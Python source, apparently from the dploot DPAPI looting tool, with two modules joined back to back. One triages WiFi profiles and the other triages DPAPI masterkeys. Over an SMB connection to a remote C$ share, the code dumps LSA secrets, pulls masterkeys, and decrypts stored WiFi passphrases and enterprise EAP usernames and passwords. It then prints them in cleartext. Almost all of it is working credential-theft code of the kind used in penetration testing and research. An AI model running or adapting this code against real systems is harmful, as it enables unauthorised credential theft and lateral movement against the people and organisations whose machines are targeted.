        self.xml_data = xml_data

        # EAP params
        self.onex = None
        self.eap_host_config = None
        self.eap_type = None
        self.eap_username = eap_username
        self.eap_password = eap_password
        self.eap_domain = eap_domain

        if self.auth == "WPA2" or self.auth == "WPA":
            self.onex = getattr(
                self.xml_data.MSM.security,
                "{http://www.microsoft.com/networking/OneX/v1}OneX",
            )
            self.eap_host_config = getattr(
                self.onex.EAPConfig,
                "{http://www.microsoft.com/provisioning/EapHostConfig}EapHostConfig",
            )
            eap_type = int(
                getattr(
                    self.eap_host_config.EapMethod,
                    "{http://www.microsoft.com/provisioning/EapCommon}Type",
                )
            )
            self.eap_type = EAP_TYPES[eap_type]

    def dump(self) -> None:
        print("[WIFI]")
        print("SSID:\t\t%s" % self.ssid)
        if self.auth.upper() in ["WPAPSK", "WPA2PSK", "WPA3SAE"]:
            print("AuthType:\t%s" % self.auth.upper())
            print("Encryption:\t%s" % self.encryption.upper())
            print("Preshared key:\t%s" % self.password)
        elif self.auth.upper() in ["WPA", "WPA2"]:
            print("AuthType:\t%s EAP" % self.auth.upper())
            print("Encryption:\t%s" % self.encryption.upper())
            print("EAP Type:\t%s" % self.eap_type)
            if self.eap_username is not None and self.eap_password is not None:
                print("Credentials:\t", end="")
                if self.eap_domain is not None and len(self.eap_domain) != 0:
                    print("%s/" % self.eap_domain, end="")
                print(f"{self.eap_username}:{self.eap_password}")
            print()
            self.dump_all_xml(self.eap_host_config)
        elif self.auth.upper() == "OPEN":
            print("AuthType:\t%s" % self.auth.upper())
            print("Encryption:\t%s" % self.encryption.upper())
        print()

    def dump_all_xml(self, node, n: int = 0) -> None:
        key = node.tag
        if type(node) is objectify.ObjectifiedElement:
            key = key.split("}")[1] if "}" in key else key
            print("  " * n + key + ":")
            for element in node.iterchildren():
                self.dump_all_xml(element, n + 1)
        else:
            key = key.split("}")[1] if "}" in key else key
            print(f"{'  ' * n}{key}: {node.text}")

    def dump_quiet(self) -> None:
        if self.auth.upper() == "OPEN":
            print(f"[WIFI] {self.ssid} - OPEN")
        elif self.auth.upper() in ["WPAPSK", "WPA2PSK", "WPA3SAE"]:
            print(f"[WIFI] {self.ssid} - {self.auth.upper()} - Passphrase: {self.password}")
        elif self.auth.upper() in ["WPA", "WPA2"]:
            if self.eap_username is not None and self.eap_password is not None:
                print(
                    f"[WIFI] {self.ssid} - WPA EAP - {self.eap_type} - {self.eap_username}:{self.eap_password}"
                )
            else:
                print(f"[WIFI] {self.ssid} - WPA EAP - {self.eap_type}")
        else:
            print(f"[WIFI] {self.auth.upper()} - {self.ssid}")


class WifiTriage(Triage):
    system_wifi_generic_path = "ProgramData\\Microsoft\\Wlansvc\\Profiles\\Interfaces"
    share = "C$"

    eap_profiles_keys = (
        "SOFTWARE\\Microsoft\\Wlansvc\\Profiles",
        "SOFTWARE\\Microsoft\\Wlansvc\\UserData\\Profiles",
    )

    def __init__(
        self,
        target: Target,
        conn: DPLootSMBConnection,
        masterkeys: List[Masterkey],
        per_profile_callback: Callable = None,
        false_positive: List[str] | None = None,
    ) -> None:
        super().__init__(
            target, 
            conn, 
            masterkeys=masterkeys, 
            per_loot_callback=per_profile_callback, 
            false_positive=false_positive
        )

    def triage_wifi(self) -> List[WifiCred]:
        wifi_creds = []
        try:
            wifi_dir = self.conn.remote_list_dir(
                self.share, self.system_wifi_generic_path
            )
            if wifi_dir is not None:
                for directory in wifi_dir:
                    if (
                        directory.is_directory() > 0
                        and directory.get_longname() not in self.false_positive
                    ):
                        wifi_interface_path = ntpath.join(
                            self.system_wifi_generic_path, directory.get_longname()
                        )
                        wifi_interface_dir = self.conn.remote_list_dir(
                            self.share, wifi_interface_path
                        )
                        for file in wifi_interface_dir:
                            filename = file.get_longname()
                            if (
                                file.is_directory() == 0
                                and filename not in self.false_positive
                                and filename[-4:].lower() == ".xml"
                            ):
                                wifi_interface_filepath = ntpath.join(
                                    wifi_interface_path, filename
                                )
                                logging.debug(
                                    f"Found Wifi connection file: \\\\{self.target.address}\\{self.share}\\{wifi_interface_filepath}"
                                )
                                wifi_interface_data = self.conn.readFile(
                                    self.share, wifi_interface_filepath, looted_files=self.looted_files
                                )
                                main = objectify.fromstring(wifi_interface_data)

                                ssid = main.SSIDConfig.SSID.name.text
                                auth_type = (
                                    main.MSM.security.authEncryption.authentication.text
                                )
                                encryption = (
                                    main.MSM.security.authEncryption.encryption.text
                                )

                                wifi_profile = None

                                if auth_type in ["WPA2PSK", "WPAPSK", "WPA3SAE"]:
                                    dpapi_blob = main.MSM.security.sharedKey.keyMaterial
                                    masterkey = find_masterkey_for_blob(
                                        unhexlify(dpapi_blob.text),
                                        masterkeys=self.masterkeys,
                                    )
                                    password = b""
                                    if masterkey is not None:
                                        cleartext = decrypt_blob(
                                            unhexlify(dpapi_blob.text),
                                            masterkey=masterkey,
                                        )
                                        if cleartext is not None:
                                            password = cleartext.removesuffix(b"\x00")
                                    wifi_profile = WifiCred(
                                        ssid=ssid,
                                        auth=auth_type,
                                        encryption=encryption,
                                        password=password.decode(
                                            "latin-1", errors="backslashreplace"
                                        ),
                                        xml_data=main,
                                    )
                                elif auth_type in ["WPA", "WPA2"]:
                                    creds = self.triage_eap_creds(filename[:-4])
                                    eap_username = None
                                    eap_password = None
                                    eap_domain = None
                                    if creds is not None:
                                        eap_username, eap_domain, eap_password = (
                                            _.decode(
                                                "latin-1", errors="backslashreplace"
                                            )
                                            for _ in creds
                                        )
                                    wifi_profile = WifiCred(
                                        ssid=ssid,
                                        auth=auth_type,
                                        encryption=encryption,
                                        xml_data=main,
                                        eap_username=eap_username,
                                        eap_domain=eap_domain,
                                        eap_password=eap_password,
                                    )
                                else:
                                    wifi_profile = WifiCred(
                                        ssid=ssid,
                                        auth=auth_type,
                                        encryption=encryption,
                                        xml_data=main,
                                    )

                                wifi_creds.append(wifi_profile)
                                if self.per_loot_callback is not None:
                                    self.per_loot_callback(wifi_profile)
        except Exception as e:
            if logging.getLogger().level == logging.DEBUG:
                import traceback

                traceback.print_exc()
                logging.debug(f"{__name__}: {e!s}")
        return wifi_creds

    def triage_eap_creds(self, eap_profile) -> list[bytes]:
        try:
            if self.conn.local_session:
                msm_bytes = None

                # For each user:
                for user_sid, profile_path in self.conn.getUsersProfiles().items():
                    #   open user registry file in user profile's dir/NTUser.dat

                    reg_file_path = self.conn.get_real_path(os.path.join(profile_path, "NTUSER.DAT"))
                    reg = None

                    # Workaround for a bug in impacket.winregistry.Registry:
                    # if Registry() is called and raises an exception during initialisation (that you can handle),
                    # the destruction of the (not initialized) Registry instance will raise an exception (that you cannot handle)
                    if not os.path.isfile(reg_file_path):
                        continue

                    try:
                        reg = Registry(reg_file_path, isRemote=False)
                    except Exception as e:
                        logging.debug(
                            f"Exception while instantiating Registry({reg_file_path}): {e}. Continuing."
                        )
                        continue
                    #   check for network profile in both eap_profiles_keys
                    for eap_profile_key in self.eap_profiles_keys:
                        #       retrieve MSMUserData
                        msm_value = ntpath.join(
                            eap_profile_key, eap_profile, "MSMUserData"
                        )
                        msm_tuple = reg.getValue(msm_value)
                        if msm_tuple is None:
                            continue
                        msm_bytes = msm_tuple[1]
                        break

                    if msm_bytes is not None:
                        logging.debug(
                            f"Found profile in registry at HKU\\{user_sid}\\{ntpath.dirname(msm_value)}"
                        )
                        break

                if msm_bytes is None:
                    # we searched the network profile in all found users, and could not find it.
                    logging.debug(f"Could not find corresponding registry value MSMUserData for {eap_profile}")
                    return None

            else:
                self.conn.enable_remoteops()
                dce = self.conn.remote_ops._RemoteOperations__rrp

                # Open HKEY_USERS
                ans = rrp.hOpenUsers(dce)
                hRootKey = ans["phKey"]

                # for each subkey:
                ans = rrp.hBaseRegOpenKey(
                    dce,
                    hRootKey,
                    "",
                    samDesired=rrp.MAXIMUM_ALLOWED | rrp.KEY_ENUMERATE_SUB_KEYS,
                )
                keyHandle = ans["phkResult"]
                user_sids = set()
                i = 0
                while True:
                    try:
                        enum_ans = rrp.hBaseRegEnumKey(dce, keyHandle, i)
                        i += 1
                        user_sids.add(enum_ans["lpNameOut"][:-1])
                    except rrp.DCERPCSessionError as e:
                        if e.get_error_code() == ERROR_NO_MORE_ITEMS:
                            break
                    except Exception as e:
                        import traceback

                        traceback.print_exc()
                        logging.error(str(e))
                rrp.hBaseRegCloseKey(dce, keyHandle)
                ans = keyHandle = None

                found = False
                for sid, eap_profile_key in itertools.product(
                    user_sids, self.eap_profiles_keys
                ):
                    # look for profile
                    subKey = f"{sid}\\{eap_profile_key}\\{eap_profile}"
                    try:
                        ans = rrp.hBaseRegOpenKey(dce, hRootKey, subKey)
                        keyHandle = ans["phkResult"]
                        found = True
                        break
                    except rrp.DCERPCSessionError as e:
                        if e.get_error_code() == ERROR_FILE_NOT_FOUND:
                            continue
                    except Exception as e:
                        import traceback

                        traceback.print_exc()
                        logging.error(str(e))

                if not found:
                    logging.debug("Could not find corresponding registry key")
                    return None

                logging.debug(f"Found profile in registry at HKU\\{subKey}")

                # retrieve MSMUserData
                keyHandle = ans["phkResult"]
                _, msm_bytes = rrp.hBaseRegQueryValue(
                    self.conn.remote_ops._RemoteOperations__rrp,
                    keyHandle,
                    "MSMUserData",
                )

                rrp.hBaseRegCloseKey(dce, keyHandle)
                ans = keyHandle = None

            masterkey = find_masterkey_for_blob(msm_bytes, masterkeys=self.masterkeys)
            if masterkey is None:
                return None

            blob = decrypt_blob(blob_bytes=msm_bytes, masterkey=masterkey)
            # FIXME: it seems decrypt_blob sometimes adds zeroes at then end of the cleartext.
            # when the result is passed to decrypt_blob again later, the DPAPI_BLOB built from blob_bytes
            # will be valid, but its .rawData will contain extra bytes

            # This (loosely) follows what is described in "Dumping Stored Enterprise Wifi Credentials with Invoke-WifiSquid"
            # https://kylemistele.medium.com/dumping-stored-enterprise-wifi-credentials-with-invoke-wifisquid-5a7fe76f800 ,

            prefix = blob[168:176]
            username = blob[176:].split(b"\0")[0]
            domain = blob[176:].split(b"\0")[1]
            password = blob[432:].split(b"\0")[1]

            # if prefix is [0x03, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00] the password is not encrypted
            if prefix == b"\x04\x00\x00\x00\x02\x00\x00\x00":
                index = blob[176:].find(b"\x01\x00\x00\x00\xd0\x8c\x9d\xdf\x01")
                if index == -1:
                    logging.debug("Couldn't find password signature!")
                    return (username, domain, password)
                index += 176
                msm_bytes = blob[index:]
                masterkey = find_masterkey_for_blob(
                    msm_bytes, masterkeys=self.masterkeys
                )

                if masterkey is None:
                    logging.info("Couldn't find key to decrypt password.")
                    logging.info(
                        "Try saving machinemasterkeys and masterkeys in a file and launch again with this file as mkfile."
                    )
                    return (username, domain, password)

                found_password = decrypt_blob(blob_bytes=msm_bytes, masterkey=masterkey)
                if found_password is not None:
                    password = found_password.rstrip(b"\x00")
            return (username, domain, password)

        except Exception as e:
            if logging.getLogger().level == logging.DEBUG:
                import traceback

                traceback.print_exc()
                logging.debug(str(e))
            return None
        return None



from binascii import hexlify, unhexlify
import logging
import ntpath
import os
from typing import Any, Dict, List, Optional

from impacket.examples.secretsdump import LSASecrets

from dploot.triage import Triage
from dploot.lib.masterkey import Masterkey
from dploot.lib.target import Target
from dploot.lib.utils import is_guid, find_guid, find_sha1, parse_file_as_list
from dploot.lib.smb import DPLootSMBConnection


def parse_masterkey_file(filename) -> List[Masterkey]:
    masterkeys = []
    masterkeys_lines = parse_file_as_list(filename)
    for masterkey in masterkeys_lines:
        guid, sha1 = masterkey.split(":", 1)
        masterkeys.append(
            Masterkey(
                guid=find_guid(guid),
                sha1=find_sha1(sha1),
            )
        )
    return masterkeys


class MasterkeysTriage(Triage):
    user_masterkeys_generic_path = "AppData\\Roaming\\Microsoft\\Protect"
    system_masterkeys_generic_path = "Windows\\System32\\Microsoft\\Protect"
    share = "C$"
        
    def __init__(
        self,
        target: Target,
        conn: DPLootSMBConnection,
        pvkbytes: Optional[bytes] = None,
        passwords: Optional[Dict[str, str]] = None,
        nthashes: Optional[Dict[str, str]] = None,
        dpapiSystem: Optional[Dict[str, str]] = None,
        per_masterkey_callback: Any = None,
        false_positive: List[str] | None = None,
    ) -> None:
        super().__init__(
            target, 
            conn,
            per_loot_callback=per_masterkey_callback,
            false_positive=false_positive,
        )
        self.pvkbytes = pvkbytes
        self.passwords = passwords
        self.nthashes = nthashes

        self._users = None
        self.all_looted_masterkeys = []
        self.dpapiSystem = dpapiSystem
        if self.dpapiSystem is None:
            self.dpapiSystem = {}
        # should be {"MachineKey":"key","Userkey":"key"}

    def triage_system_masterkeys(self) -> List[Masterkey]:
        masterkeys = []
        logging.getLogger("impacket").disabled = True
        if len(self.dpapiSystem) == 0:
            if self.conn.local_session:
                self.conn.enable_localops(
                    os.path.join(
                        self.target.local_root, r"Windows/System32/config/SYSTEM"
                    )
                )
            else:
                self.conn.enable_remoteops()
            if self.conn.bootkey:
                logging.debug(f"Got Bootkey: {hexlify(self.conn.bootkey)}")

                try:
                    SECURITYFileName = (
                        os.path.join(
                            self.target.local_root, r"Windows/System32/config/SECURITY"
                        )
                        if self.conn.local_session
                        else self.conn.remote_ops.saveSECURITY()
                    )
                    # retrieve DPAPI keys
                    LSA = LSASecrets(
                        SECURITYFileName,
                        self.conn.bootkey,
                        self.conn.remote_ops,
                        isRemote=(not bool(self.conn.local_session)),
                        perSecretCallback=self.getDPAPI_SYSTEM,
                    )
                    LSA.dumpSecrets()
                    LSA.finish()
                except Exception as e:
                    logging.error("LSA hashes extraction failed: %s" % str(e))
        if self.dpapiSystem is None or len(self.dpapiSystem) != 2:
            logging.debug("Could not get DPAPI SYSTEM keys")
            return masterkeys
        system_protect_dir = self.conn.remote_list_dir(
            self.share, path=self.system_masterkeys_generic_path
        )
        for d in system_protect_dir:
            if (
                d not in self.false_positive
                and d.is_directory() > 0
                and d.get_longname()[:2].upper() == "S-"
            ):  # could be a better way to deal with sid
                sid = d.get_longname().upper()
                system_protect_dir_sid_path = ntpath.join(
                    self.system_masterkeys_generic_path, sid
                )
                system_sid_dir = self.conn.remote_list_dir(
                    self.share, path=system_protect_dir_sid_path
                )
                for f in system_sid_dir:
                    if f.is_directory() == 0 and is_guid(f.get_longname()):
                        guid = f.get_longname()
                        filepath = ntpath.join(system_protect_dir_sid_path, guid)
                        logging.debug(
                            f"Found SYSTEM system MasterKey: \\\\{self.target.address}\\{self.share}\\{filepath}"
                        )
                        # read masterkey
                        masterkey_bytes = self.conn.readFile(self.share, filepath, looted_files=self.looted_files)
                        if masterkey_bytes is not None:
                            masterkey = Masterkey(
                                guid=guid,
                                blob=masterkey_bytes,
                                sid=sid,
                                user="SYSTEM"
                            )
                            self.all_looted_masterkeys.append(masterkey)
                            if masterkey.decrypt(dpapi_systemkey=self.dpapiSystem):
                                masterkeys.append(masterkey)
                                if self.per_loot_callback is not None:
                                    self.per_loot_callback(masterkey)
                    elif f.is_directory() > 0 and f.get_longname().upper() == "USER":
                        system_protect_dir_user_path = ntpath.join(
                            system_protect_dir_sid_path, f.get_longname()
                        )
                        system_user_dir = self.conn.remote_list_dir(
                            self.share, path=system_protect_dir_user_path
                        )
                        for g in system_user_dir:
                            if g.is_directory() == 0 and is_guid(g.get_longname()):
                                guid = g.get_longname()
                                filepath = ntpath.join(
                                    system_protect_dir_user_path, guid
                                )
                                logging.debug(
                                    f"Found SYSTEM user MasterKey: \\\\{self.target.address}\\{self.share}\\{filepath}"
                                )
                                # read masterkey
                                masterkey_bytes = self.conn.readFile(
                                    self.share, filepath, looted_files=self.looted_files
                                )
                                if masterkey_bytes is not None:
                                    masterkey = Masterkey(
                                        guid=guid,
                                        blob=masterkey_bytes,
                                        sid=sid,
                                        user="SYSTEM_User"
                                    )
                                    self.all_looted_masterkeys.append(masterkey)
                                    if masterkey.decrypt(dpapi_systemkey=self.dpapiSystem):
                                        masterkeys.append(masterkey)
                                        if self.per_loot_callback is not None:
                                            self.per_loot_callback(masterkey)
        return masterkeys

    def triage_masterkeys(self) -> List[Masterkey]:
        masterkeys = []
        for user in self.users:
            try:
                masterkeys += self.triage_masterkeys_for_user(user)
            except Exception as e:
                if logging.getLogger().level == logging.DEBUG:
                    import traceback

                    traceback.print_exc()
                    logging.debug(str(e))
        return masterkeys

    def triage_masterkeys_for_user(self, user: str) -> List[Masterkey]:
        masterkeys = []
        user_masterkey_path = ntpath.join(
            ntpath.join("Users", user), self.user_masterkeys_generic_path
        )
        user_protect_dir = self.conn.remote_list_dir(
            self.share, path=user_masterkey_path
        )
        if (
            user_protect_dir is None
        ):  # Yes, it's possible that users have an AppData tree but no Protect folder
            return masterkeys
        for d in user_protect_dir:
            if (
                d not in self.false_positive
                and d.is_directory() > 0
                and d.get_longname()[:2].upper() == "S-"
            ):  # could be a better way to deal with sid
                sid = d.get_longname().upper()
                user_masterkey_path_sid = ntpath.join(
                    ntpath.join(
                        ntpath.join("Users", user), self.user_masterkeys_generic_path
                    ),
                    sid,
                )
                user_sid_dir = self.conn.remote_list_dir(
                    self.share, path=user_masterkey_path_sid
                )
                for f in user_sid_dir:
                    if f.is_directory() == 0 and is_guid(f.get_longname()):
                        guid = f.get_longname()
                        filepath = ntpath.join(user_masterkey_path_sid, guid)
                        logging.debug(
                            f"Found MasterKey: \\\\{self.target.address}\\{self.share}\\{filepath}"
                        )
                        # read masterkey
                        masterkey_bytes = self.conn.readFile(self.share, filepath, looted_files=self.looted_files)
                        if masterkey_bytes is not None:
                            password = None
                            nthash = None
                            if (
                                self.passwords is not None
                                and user.lower() in self.passwords
                            ):
                                password = self.passwords[user.lower()]
                            elif (
                                self.passwords is not None
                                and user.rpartition(".")[0].lower() in self.passwords
                            ):
                                password = self.passwords[
                                    user.rpartition(".")[0].lower()
                                ]  # In case of duplicate (like admin and admin.waza) on usernames in c:\Users\
                            if (
                                self.nthashes is not None
                                and user.lower() in self.nthashes
                            ):
                                nthash = self.nthashes[user.lower()]
                            elif (
                                self.nthashes is not None
                                and user.rpartition(".")[0].lower() in self.nthashes
                            ):
                                nthash = self.nthashes[user.rpartition(".")[0].lower()]
                            masterkey = Masterkey(
                                guid=guid,
                                blob=masterkey_bytes,
                                sid=sid,
                                user=user,
                            )
                            self.all_looted_masterkeys.append(masterkey)
                            if masterkey.decrypt(
                                domain_backupkey=self.pvkbytes,
                                password=password,
                                nthash=nthash,
                            ):
                                masterkeys.append(masterkey)
                                if self.per_loot_callback is not None:
                                    self.per_loot_callback(masterkey)
        return masterkeys

    def getDPAPI_SYSTEM(self, _, secret) -> None:
        if secret.startswith("dpapi_machinekey:"):
            machineKey, userKey = secret.split("\n")
            machineKey = machineKey.split(":")[1]
            userKey = userKey.split(":")[1]
            self.dpapiSystem["MachineKey"] = unhexlify(machineKey[2:])
            self.dpapiSystem["UserKey"] = unhexlify(userKey[2:])

    @property
    def users(self) -> List[str]:
        if self._users is not None:
            return self._users

        self._users = self.conn.list_users(self.share)

        return self._users
